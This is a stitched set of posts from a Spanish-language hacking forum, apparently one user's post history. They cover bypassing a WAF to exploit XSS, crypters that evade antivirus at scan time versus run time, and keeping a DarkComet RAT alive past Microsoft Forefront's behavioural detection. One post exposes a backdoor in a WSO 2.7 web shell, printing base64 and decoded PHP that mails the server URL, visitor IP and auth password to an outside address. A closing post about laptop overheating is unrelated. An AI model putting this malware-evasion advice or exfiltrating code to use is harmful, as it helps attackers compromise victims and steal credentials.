Hola a todos, no tengo mucho conocimiento con los XSS y justo me ha surgido un problema. Envio un vector, el mas simple, pero no llega a saltar el alert, simplemente se ve como texto en el html. A continuacion muestro como se ve en la ventana del firebug luego de enviar el vector.



Debo mencionar que he intentado con otros tag html pero sigo obteniendo el mismo resultado. En conclusion, mis preguntas son: hay forma de explotar este xss?, esto es obra de un WAF? si es asi, solo debo buscar la manera de bypassearlo modificando los caracteres cierto?


Saludos,

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso es por que el Crypter es Scantime y no Runtime. Es por eso que al ejecutarlo, salta el AV

Saludos!
ANTRAX

Exactamente, como dijo ANTRAX.
Usaste un crypter como su nombre lo dice SCANTIME, que a la hora de escanear es indetectable mas a la hora de ejecutarse no..
Runtime, vendría siendo el opuesto, es indetectable a la hora de correrlo, la mayoría de RUNTIME viene junto con SCANTIME. Un saludo ~

Bueno, creo que Kodeinfect ya respondio sobre mi segunda duda. Seguire dandole!

Gracias Kodeinfect!

Saludos,

Debo utilizar uno y despues el otro o puedo programarlo en el de scantime que ya tengo? , Viendolo desde el lado programatico yo podria podria decir que si, si van a ser tareas diferentes(primero descifro y luego lo "oculto" en el runtime) pero quiero saber tu opinion.

Gracias Antrax!

PD: Seguro andare molestandote si no me ubico bien con la info de los scantime

Saludos,

Hola a todos, primero, debo decir que del malware no soy muy conocedor y a continuacion, explicarles mi problema:

Bien, estoy utilizando el Darkcomet(5.3.1) contra Win7(server y client), lo cifro con un crypter que he modificado desde codigo y binario, y aunque no es FUD, se ha hecho indetectable para el Microsoft Forefront Endpoint 2010 y es ese con el que estoy trabajando. Sin proteccion todo funciona bien, se conecta, no se rompe. Sin embargo, cuando activo la proteccion, sigue sin detectarlo y hasta lo ejecuto y se logra ver en el panel del darkcomet pero pasan no mas de 5 segundos y se pierde la conexion porque el AV lo detecto. Se que el AV esta detectando alguna accion maliciosa,seguramente, de un proceso(el RAT) y lo elimina pero quisiera saber: ¿que mas puedo hacer si en el analisis estatico del AV aparece indetectable? Ideas!

Gracias!

Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Hola Nizzee, yo tambien tenia una portatil HP (dv6) y tenia el mismo problema con ubuntu 10.04, 11.04 que son los que pretendia instalar asi que decidi dejarla de usar porque por momentos se apagaba por la temperatura. Luego de un tiempo alguien pudo responderme en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y me dijo que le instalara la 12.04, que en esa version las cosas habian mejorado. Efectivamente, la temperatura habia disminuido y ya no se apagaba repentinamente pero aun no estaba a gusto. Ya la he cambiado por un toshiba y no tengo ninguna queja. Con todo esto no pretendo que botes tu portatil, solo te cuento mi experiencia y te digo que en mi opinion es problema de esa marca. Prueba con la 12.04 si es que no es la que estabas instalando sino intenta de todo. Suerte!!